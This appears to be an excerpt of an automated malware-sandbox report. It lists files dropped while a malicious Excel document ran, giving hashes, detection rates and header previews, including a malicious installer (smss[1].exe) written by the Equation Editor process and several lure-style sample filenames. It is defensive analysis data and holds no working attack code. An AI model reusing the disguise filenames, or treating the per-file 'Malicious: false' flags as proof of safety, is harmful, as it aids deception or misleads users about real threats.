C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.2504

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1035
Entropy (8bit):	5.14859305498125
Encrypted:	false
SSDEEP:	24:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBmid8HxPs3yTTtPmid8OPgx4s3yTDHBa:1kxPuyvthNgx4uyHfkxPuyvthNgx4uyw
MD5:	FCE71B64BAF106F5C0927EECEFEA6C02
SHA1:	4F77E36BB83232845C873C7063FFE1AA00BB19FA
SHA-256:	508A2291423497E590A1055F310905F1F3EECC479BEE0A11E0C6583763947FC9
SHA-512:	7C1DD4A949EDFA90D06886827253C8A18AFA3DD80ED281D1A8613DD0BED8742F63FF0542545F0360C60F0B591BF4AFFCD52F8DDDAD2FD92E92D23100EC9E1FDE
Malicious:	false
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:276

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.2504

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	9566
Entropy (8bit):	5.226610011802065
Encrypted:	false
SSDEEP:	192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV
MD5:	63B24EA3A13EAC476D6309BB202EF459
SHA1:	89502C393549C20C933E4553F51F74F3DBE085EF
SHA-256:	2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA
SHA-512:	2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC
Malicious:	false
Preview:	%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426577650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	260308
Entropy (8bit):	2.2945364945354627
Encrypted:	false
SSDEEP:	1536:ulNTBeJFFFFFFp7HDyWC+MoEgpPvrtpyxxxxxxVzS:uADyt+MoEgpP
MD5:	C0CC8885F2F437FE0C4D63A783C8A882
SHA1:	D6C4FF19817095D12AA65CB17DCFAEF2E5B88284
SHA-256:	52886A7220F413A6180878EE4D58E30E27D0E64EAED92BA1BFB77223A4708D77
SHA-512:	7BF5BE73133C06990AFFF614B1DE8D116C452102B62BF39787219A02425BA921F499F1030726F93FEA7F4B5BFE93CF8C83AA0FBA2047AA91D652226182EA13CC
Malicious:	false
Preview:	Adobe Acrobat Reader DC 19.0....?A12_FindInDocument.............................................................................................................................................ppp.ppp`ppp.ppp.ppp.ppp.ppppppp ............................................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp ............................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp0........................................ppp.ppp.ppp.ppp.pppP................ppp0ppp.ppp.ppp.ppp.ppp0................................ppp.ppp.ppp.ppp.ppp.............................ppp`ppp.ppp.ppp.............................ppp.ppp.ppp.ppp.ppp.....................................ppp.ppp.ppp.ppp`........................ppp`ppp.ppp.pppP........................................ppp.ppp.ppp.ppp.........................ppp.ppp.ppp.........ppp.............ppp.........ppp.........ppp.ppp.ppp.........................ppp.ppp.ppp.....ppp0ppp.ppp`....ppp`ppp.ppp0ppp.ppp.ppp.....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	72643
Entropy (8bit):	5.393779678652009
Encrypted:	false
SSDEEP:	768:PCbTjMYOpdyVFWqnPvBRSiRkTIVzY3Z4nMaKYDlXZYyu:AlOpdyVFWcPvBBRkTIdY3SpZK
MD5:	94E97053E3BC849C74AD304FAE464E83
SHA1:	A203517E488418E3F846DA04CEDD39A82020F8B2
SHA-256:	B2EB8313F09FF7E315BEE69391F11E06D50895E57F90810108AED97155C4767C
SHA-512:	A9BF907D89F8A8BD489CE6453E4FA95DC25B1ED05E224C3FB2D762123D87F4F02792BC4674EEDD09A9B06106A343BFE8A9038BCE7CD769AAB477DCCFE87B7E0C
Malicious:	false
Preview:	4.458.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.85.FID.2:o:........:F:Aparajita.P:Aparajita.L:&.........................."F:Aparajita.#.99.FID.2:o:........:F:Aparajita-Italic.P:Aparajita Italic.L:&.........................."F:Aparajita.#.95.FID.2:o:........:F:Aparajita-Bold.P:Aparajita Bold.L:&.........................."F:Aparajita.#.108.FID.2:o:........:F:Aparajita-BoldItalic.P:Aparajita Bold Italic.L:&.........................."F:Aparajita.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1272864
Entropy (8bit):	7.983367304390116
Encrypted:	false
SSDEEP:	24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
MD5:	6E8215EEE3034D6DCF18D79D397E5715
SHA1:	5612BFF0830A9A025EB35CF7C054D2062745D1B9
SHA-256:	AC4761C259DAEDE4B4EFB78816C98FB56344E381BB56D69EA897C30C9899BF39
SHA-512:	5B5A08E02C7F58F25A436508848F90D397C2545B474F37202CEF5F8BA9D4924761E500A2D54E082F51EABD80B2CC33D21D73B45206D79E64C7BB0CE21ABF83C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 32% Antivirus: Virustotal, Detection: 32%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................`..........52.......p....@.......................................@.................................0t.......................T...............................................................p...............................text...}_.......`.................. ..`.rdata..>....p.......d..............@..@.data................x..............@....ndata...`...@...........................rsrc................\|..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10E6DBD5.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	330948
Entropy (8bit):	4.9725570532731105
Encrypted:	false
SSDEEP:	3072:x0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:x0Bd8yCKdQRzw4muaZ9TARfMDcFi
MD5:	650597A7FDBDF9A4DB26282FC4650C97
SHA1:	101C0429EC666765CDBEB112AA211EA29FA43058
SHA-256:	8900A8D37CE8BFAADA8ADDF1FAB7B4DFC616FB0FA3D2A482A207BD60A3C46676
SHA-512:	3DA8D40F5A949B1F62878654AB444B96893F91B63114ADA97EB9FD7D7E9FDA593E7553EDE052934397906D730323F2D10C81813B2CBFE78A0AE2D487677EE6F2
Malicious:	false
Preview:	....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DF8BD5C.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	884312
Entropy (8bit):	1.2944875740888722
Encrypted:	false
SSDEEP:	1536:k3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:5ux/ZiOE85e+8J2dvRcvMyw
MD5:	B6DFB3AA7AC4A1A52336C30FA821857B
SHA1:	66ECB808A516AC5B07A01CDFCAD65FD7B9907619
SHA-256:	E22202331F689D7568E674B0DCD895DF66FAC5980498F05A846DE244AB3394C4
SHA-512:	A13562F976BCBEEF7D4B4926C37E39BFD4C588EF6E746792B806E6737C91604175395021D4884493D764CE7F0EE2ACC6C7D03A6045A5B4ED6616E5D7E4C9FE94
Malicious:	false
Preview:	....l............................F..C%.. EMF....X~..............................@................................................................F..C%..................Q....}..........................................P...(...x...$}...... ....F..C%..(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FBBD4EF.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.5719113060369843
Encrypted:	false
SSDEEP:	1536:YTg8p9E9G919NmVVg999vM9W9+99rjx9VwwI2o9l9O9c99999d93feVr2rX6tb71:Igev7w1qbEn0cK1biej15fde
MD5:	AB3C71DADD57C96DE74236A677761633
SHA1:	B1831C9C1D2276395D10AAA35D0A837A1E51C31C
SHA-256:	BE0B0602293E0078A54D37F29B03C21091D4450EDCF827A577D376E670A2C445
SHA-512:	D8A711A9F27244CB49F5C9813F2B11B5300A4D48BD30477110F33B08551696CB0FB52DCE072F6C962B04CB57CDAD14C16CF25C675683D65C61B88B2B05BB9354
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F1D07D2.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1504468
Entropy (8bit):	1.053474355446965
Encrypted:	false
SSDEEP:	6144:mmA9GHd0sV3GzfRnt9lGnz+CdHKz91sLW9TOuKPUWkGWzAOvRbNAvY:mmndNGzJnYnz+1z997K0zD
MD5:	35E141964E2698FC12D087516D116C9A
SHA1:	E2E0713E181633BB4D5247D5B37A7FF854165538
SHA-256:	6A3A2ADDC5D6B554EED64B7C24B699E09BCF019E4F42AB14EC6D40C7CB749538
SHA-512:	70CF79F2CDAC3065E5EF644A666358ADAACAB8F1B4E458BAA9B9057AD1B3EE1DD432F6EDE973FB76A60F8945D31A8DDB5E04B34912DF292C7D8B752AE39F3F4E
Malicious:	false
Preview:	....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\591911AB.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	884312
Entropy (8bit):	1.2944965349348616
Encrypted:	false
SSDEEP:	1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
MD5:	9ABE7EB352E0DB96B52C99AC2FDEA85F
SHA1:	8DC45D02308275BA32B7FFB320A3042256D40C8B
SHA-256:	EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
SHA-512:	E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
Malicious:	false
Preview:	....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D7B77CA.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	433328
Entropy (8bit):	5.820383898498903
Encrypted:	false
SSDEEP:	6144:Wifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:Wl7kwvqULUVS
MD5:	6DA3C83DC31817ECE4A6D2DAB9F304D5
SHA1:	501068A7C53E59450D130658C547092C21074685
SHA-256:	8AB3AFA5BE9C1891C1622C8D350A2266BBB1829D73C4B22CEB184107FEB413C2
SHA-512:	E1A2C6B0CEC5533F34E3086A75D4FDE55F8E8F32B3665976EF95790EA2C015AC6D88D66EB584C5EE83AFA81CDC5EDBCAC995B9AC4966CFC4D7C37D568D01304C
Malicious:	false
Preview:	....l...........[................S..%;.. EMF........t...........................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73B99143.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	1.9017483361098562
Encrypted:	false
SSDEEP:	24:YOu6PJqRixxBBBQAAJnHbG/KD3ql/mfzG/S6ATn9eDIb6eD/qLvae:9u6IRixxBBBQlJatF6n8g/wae
MD5:	8F636083CE616F8EB610556C57CC3CAA
SHA1:	4291DA8874EF4A60300F4BAAEC84F5A4A425E31E
SHA-256:	62E41677B9A6F9B0139BB4D5EAA890F1423F707383A960FFA261A7C4A677F3EB
SHA-512:	78FF54528C73E9E52C67FC8536BDA2628F4177ACDC9E749F4EAF69639F82E468B3766AEACD4F24BABCB30227572B2F522FDDF2FBD8B790C474ACF313BD32C84A
Malicious:	false
Preview:	....l............................+..g... EMF....................................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0FCAB26.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	330948
Entropy (8bit):	4.97334923560013
Encrypted:	false
SSDEEP:	3072:90Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:90Bd8yCKdQRzw4muaZ9TARfMDcFi
MD5:	AB48787880885634A344F86D1C0C10AF
SHA1:	A69E772598EF1AF9643A27ACEA65C200B2B08CCF
SHA-256:	1EA71086D644AC428917E838640E4A89971603C783A86C735A14625D41FB9E86
SHA-512:	A0548F45F02FEF90637A35144D570C420CDB5A2BF424464A6732482E27475D6E51AB3ACD3DE32B69E51CB8D6570D004B8612AD71526EEC5A77E249A05DE3156B
Malicious:	false
Preview:	....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3A46B79.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	1.929653848333741
Encrypted:	false
SSDEEP:	12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
MD5:	4A103FC1809C8EA381D2ACB5380EF4F6
SHA1:	6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
SHA-256:	1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
SHA-512:	77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
Malicious:	false
Preview:	....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB20FF07.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1504468
Entropy (8bit):	1.0537541658250373
Encrypted:	false
SSDEEP:	6144:bmA9GwdUsV3ez/Rnd9lGHze2dHCz91j5WC/eu5PUWkGGzdQvRbNAvY:bmQdtezpnoHzeJz9Hr5Ezk
MD5:	082CF1F806641FD07D90C27CB5C263B0
SHA1:	28F7C5C949EFAFBD423EF6EDCDBDD349AFD48E34
SHA-256:	D6A38D2F039E2A2B5D1B7F48B8DE552E89107B8197D156F04F54FC23C22AC83B
SHA-512:	E14ACD45AB9F52A76D7E34E6C5C4003501446BB0D6F7D4FC4DC3A0AEE6A3E5F8E41AA9C216D4D5DB39C02086AA4CBED7FB60D6119897708AD2BF0B3E6D7376F7
Malicious:	false
Preview:	....l...........I...R...........:R..y6.. EMF....................................@...............................................................:R..y6..........J...S...Q...............I...R...................J...S...P...(...x........... ...:R..y6..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1765F49.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.6261172420512388
Encrypted:	false
SSDEEP:	1536:1MPrTq5X4MeOVPzBymPhVPSH4xfUXFfvbU77iCxlGjD+ysfh7Lhp:1MPXYPzPXc11v47Lhp
MD5:	EA2F978ED2B6A8F223F1CD74C19EBAED
SHA1:	C0AFB52EE10DE4CBE2DDD33E6F7D78734A911D54
SHA-256:	F9B575F956E6EF698500243A135B913C6DF7680E401941A313ABCFF5A553AAE3
SHA-512:	A02D3F41ED12FB51AC7C6A13680AB9220F76AEEEA9B287AB30E23A6168552F28F4AA6A74798B16B90245241872A292732A16C76EAD53AF8EE1E1F475626D88CE
Malicious:	false
Preview:	....l...........R...I............:...M.. EMF....................................@................................................................:...M..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....:...M..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB80A24.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	0.6261842732011597
Encrypted:	false
SSDEEP:	1536:GMPrTmqNX4MeOVPzBymPhVPSH4xsUXFfvbU77iCxlGjD+ysfh/mGG:GMPW0PzPXr11v4/mGG
MD5:	A01B9617553432807B9B58025B338D97
SHA1:	439BDCC450408B9735B2428C2D53D2E6977FA58C
SHA-256:	7A0426ED2E2349916969FF7087C0F76089FB8CE7F4627F3D11CCBC1AAEFCEDCE
SHA-512:	312CC2563FA865D6A939FEA85A520627C73ED9A95BAFC98C89495F21D535DC658825BE74B64F0F5C5815D1D234FC6E77A71779247E4973E39BA8DCCEC2F09BEE
Malicious:	false
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF1045AD.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	433328
Entropy (8bit):	5.820133177370174
Encrypted:	false
SSDEEP:	6144:iifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:il7kwvqULUVS
MD5:	2824C456965D260BD2D39BDCF5F8998E
SHA1:	C0885618FF2F9F1B0ED9D8F439EEEDF101BFED6D
SHA-256:	017D77EF5FB7B5FCCF22E44BC3EF915E4F5DB233788F3D06A12BD7D4219ECE03
SHA-512:	2F5BF11288E8FD26BE4CFB9392B0F7B2F7FA139365FD703E45CCE6106D25E41E825DEAEF61E77C199F22369669BE338B173D444C5EC85CC46DFB9D197F59D44A
Malicious:	false
Preview:	....l...........[................S..%;.. EMF........t...........................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\......."...........!...............................................\.......'.......................%...........................................................L...d.......D...[...........D...\...D...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFD81268.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.5719178360001411
Encrypted:	false
SSDEEP:	1536:vTg8p9E9G919NmVVg999vM9W9+99rjx9VwwI2o9l9O9c99999d93feVr2rX6tb71:Lgev7w1qbEn0cK1biej15fde
MD5:	AAC2F32AB03AE5AB1CB5AAB302B66F38
SHA1:	22EB1218444F24A7FCA07FF12423A8C0A106EECA
SHA-256:	FA311118907A83D6EF5A2AF80D55284797D74055CE2BBB4B3367755F2FEBED3E
SHA-512:	1475AA846E5E17FB528B849643E9A875D10265D4D55459430918F3EBC570D6598D2C77CAF3FBC1FA3B15554FA3748D9A4888085F08F2E1A33CEA6F78DBE402A5
Malicious:	false
Preview:	....l...........R...I............:...M.. EMF....................................@................................................................:...M..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....:...M..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.854901984552606
Encrypted:	false
SSDEEP:	192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
MD5:	0063D48AFE5A0CDC02833145667B6641
SHA1:	E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
SHA-256:	AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
SHA-512:	71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse Filename: Part_number_91875-11400_x_6.xls, Detection: malicious, Browse Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse Filename: SOA_OCT.exe, Detection: malicious, Browse Filename: SOA_OCT.exe, Detection: malicious, Browse Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse Filename: Civilizee.exe, Detection: malicious, Browse Filename: Civilizee.exe, Detection: malicious, Browse Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious, Browse Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious, Browse Filename: I-ID-4175285786-D07450364_20230803042004.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\reinhold.ini

Download File

Process:	C:\Users\user\AppData\Roaming\audiodgse.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
